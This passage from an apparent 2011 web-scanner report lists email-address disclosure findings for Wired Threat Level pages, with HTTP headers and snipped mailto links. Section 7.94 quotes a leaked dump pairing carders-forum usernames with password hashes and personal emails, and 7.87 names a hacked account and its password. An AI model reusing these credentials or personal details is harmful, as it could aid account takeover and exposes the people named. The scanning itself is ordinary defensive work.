...[SNIP]...

7.81. http://www.wired.com/threatlevel/category/three-strikes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/three-strikes/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=87
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.82. http://www.wired.com/threatlevel/category/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/tsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=107
Expires: Wed, 12 Jan 2011 15:33:55 GMT
Date: Wed, 12 Jan 2011 15:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.83. http://www.wired.com/threatlevel/category/uncategorized/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/uncategorized/

Issue detail

The following email addresses were disclosed in the response:

annalee@io9.com
david_kravets@wired.com
evan_hansen@wired.com
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=225
Expires: Wed, 12 Jan 2011 15:34:19 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:annalee@io9.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:evan_hansen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.84. http://www.wired.com/threatlevel/category/watchlists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/watchlists/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=52
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.85. http://www.wired.com/threatlevel/category/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/wikileaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:49:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=304
Expires: Wed, 12 Jan 2011 15:33:17 GMT
Date: Wed, 12 Jan 2011 15:28:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.86. http://www.wired.com/threatlevel/category/yo-ho-ho/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/yo-ho-ho/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:21:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=49
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.87. http://www.wired.com/threatlevel/tag/4chan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/4chan/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
gov.palin@yahoo.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:55 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=43
Expires: Wed, 12 Jan 2011 15:33:33 GMT
Date: Wed, 12 Jan 2011 15:32:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
</a> that a hacker had obtained unauthorized access to Palin...s Yahoo e-mail account — gov.palin@yahoo.com — by using publicly available information to reset her password to “popcorn.” The intruder then posted screenshots of Palin’s e-mail, as well as her new password, to a forum a
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.88. http://www.wired.com/threatlevel/tag/aclu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/aclu/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:56 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=48
Expires: Wed, 12 Jan 2011 15:33:46 GMT
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.89. http://www.wired.com/threatlevel/tag/al-haramain/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/al-haramain/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:58 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:03 GMT
Date: Wed, 12 Jan 2011 15:33:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.90. http://www.wired.com/threatlevel/tag/albert-gonzalez/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/albert-gonzalez/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:32:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=50
Expires: Wed, 12 Jan 2011 15:33:53 GMT
Date: Wed, 12 Jan 2011 15:33:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.91. http://www.wired.com/threatlevel/tag/apple-iphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/apple-iphone/

Issue detail

The following email addresses were disclosed in the response:

brian_x_chen@wired.com
david_kravets@wired.com
evan_hansen@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:15 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=429
Expires: Wed, 12 Jan 2011 15:41:36 GMT
Date: Wed, 12 Jan 2011 15:34:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:brian_x_chen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:evan_hansen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.92. http://www.wired.com/threatlevel/tag/blackhat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/blackhat/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
eecue@eecue.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:44:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:34:07 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.93. http://www.wired.com/threatlevel/tag/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/bradley-manning/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:06:25 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=62
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.94. http://www.wired.com/threatlevel/tag/carding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/carding/

Issue detail

The following email addresses were disclosed in the response:

Mehmet-43-@hotmail.de
asdfg-1337@web.de
cadazadmin@gmail.com
david_kravets@wired.com
deimos@carders.cc
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
nowolix@hotmail.de
ryan_singel@wired.com
shgustin@gmail.com
soh.cyberhood@googlemail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=54
Expires: Wed, 12 Jan 2011 15:34:05 GMT
Date: Wed, 12 Jan 2011 15:33:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>DEIM0S:97e36bdc7778264c9ca785b86beda24a277c4713::deimos@carders.cc<br />
Nowo:bdda38c461e2bcaf54c8c0d0adf9b946::nowolix@hotmail.de<br />
MoneyBoss:2dca6800fdf6ea230f48ba307b68e5bf::asdfg-1337@web.de<br />
sPloiT:5f2c0db92c5c716a2e4e4e55bca6b995::cadazadmin@gmail.com<br />
Moq:da2384e118f6d9aca8c0d832fdf28c90c4218c8a:fenerbahce::Mehmet-43-@hotmail.de<br />
cyberhood:29b0b59fd185b3b4a7072fb374e282e19cdc3361::soh.cyberhood@googlemail.com
</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.95. http://www.wired.com/threatlevel/tag/ccc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/ccc/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:01 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=87
Expires: Wed, 12 Jan 2011 15:34:45 GMT
Date: Wed, 12 Jan 2011 15:33:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117540

